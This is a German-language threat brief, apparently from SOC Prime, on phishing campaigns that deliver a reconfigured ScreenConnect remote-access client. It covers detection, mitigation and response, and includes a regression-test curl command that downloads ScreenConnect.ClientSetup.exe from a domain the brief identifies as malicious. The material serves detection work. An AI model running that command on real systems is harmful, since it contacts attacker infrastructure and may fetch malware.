SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

ScreenConnect-Client wird für unbefugten Remote-Zugriff missbraucht

Author Photo
SOC Prime Team linkedin icon Folgen
ScreenConnect-Client wird für unbefugten Remote-Zugriff missbraucht
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Angreifer verwenden Phishing-E-Mails, um einen legitimen, vorkonfigurierten ScreenConnect-Client zu verteilen. Das Remote Monitoring and Management (RMM)-Tool stellt eine Rückrufverbindung zu einer von Angreifern kontrollierten Instanz her und ermöglicht so den Fernzugriff auf kompromittierte Systeme. Die Kampagne nutzt die vertrauenswürdige Natur legitimer Software, um grundlegende Sicherheitskontrollen und Erkennungsmechanismen zu umgehen.

Untersuchung

Der Ermittler untersuchte eine Phishing-E-Mail mit einem Link, der eine PE-Datei lieferte. Die Analyse bestätigte, dass es sich bei der Datei um einen legitimen, digital signierten ScreenConnect-Client handelte. Allerdings wurde die eingebettete Konfiguration so geändert, dass sie sich mit einer bestimmten Relaisinstanz und Instanz-ID verbindet, die vom Angreifer kontrolliert werden.

Abschwächung

Browser können das Herunterladen ausführbarer Dateien als erste Schutzschicht blockieren. Organisationen sollten die unbefugte Nutzung von RMM-Tools überwachen und strenge Kontrollen für ausführbare Dateien durchsetzen, die von nicht vertrauenswürdigen Weblinks heruntergeladen werden. Die Anwendungs-Whitelisting kann auch helfen, zu verhindern, dass unautorisierte ScreenConnect-Clients und andere nicht genehmigte RMM-Software ausgeführt werden.

Reaktion

Wenn bösartige Aktivitäten erkannt werden, ist das betroffene Endgerät zu isolieren, um den fortgesetzten Fernzugriff durch den Angreifer zu verhindern. Identifizieren und beenden Sie alle aktiven ScreenConnect-Prozesse. Führen Sie eine forensische Überprüfung der Client-Konfiguration durch, um die Kommando-und-Kontroll-Infrastruktur des Angreifers zu identifizieren und den Umfang des unautorisierten Zugriffs auf das kompromittierte System zu bestimmen.

Angriffsfluss

Wir aktualisieren diesen Teil noch.

Erkennungen

Alternative Fernzugriffs- / Verwaltungssoftware (über Prozess-Erstellung)

SOC Prime Team
05. Okt 2026

Mögliche Kommando-und-Kontroll-Aktivität durch Remote-Access-Software-Domain-Kommunikationsversuch (über DNS)

SOC Prime Team
05. Okt 2026

Malware-Verteilung des ScreenConnect-Clients über Phishing-E-Mail [HTTP-Proxy]

SOC Prime AI Rules
05. Okt 2026

Simulationsausführung

  • Angriffserzählung & Kommandos: Der Angreifer zielt darauf ab, durch die Verteilung von ScreenConnect über eine Phishing-Kampagne auf einem Zielarbeitsplatz dauerhaft präsent zu bleiben. In dieser Simulation wiederholen wir die Endstufe: Die Maschine des Opfers stellt eine ausgehende HTTP-Anfrage an eine kompromittierte/bösartige Domain, um das Setup-Programm herunterzuladen. Um das in der Bedrohungsanalyse identifizierte spezifische Verhalten zu imitieren, verwendet der „Angreifer“ einen benutzerdefinierten User-Agent-String ScreenConnect während der Anforderung des spezifischen Dateipfads thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Dies löst die Proxy-basierte Erkennungsregel aus.

  • Regression Test Script:

    # Dieses Skript verwendet curl, um die bösartige Download-Anfrage zu imitieren, die in der Erkennungsregel identifiziert wurde.
    # Es verwendet die spezifische URL und den spezifischen User-Agent, um den Alarm auszulösen.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Simulation des ScreenConnect-Downloadversuchs..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # Wir verwenden -k, um SSL-Fehler zu ignorieren, falls die simulierte Domain ein selbstsigniertes Zertifikat verwendet,
    # und -A, um den spezifischen User-Agent festzulegen.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Simulationsbefehl gesendet."
  • Bereinigungsbefehle:

    # Es wurden in der Simulation keine Dateien tatsächlich auf den Host heruntergeladen (umgeleitet nach /dev/null).
    # Es wurden keine Änderungen am System vorgenommen.
    echo "[*] Bereinigung abgeschlossen. Keine Spuren auf dem Host hinterlassen."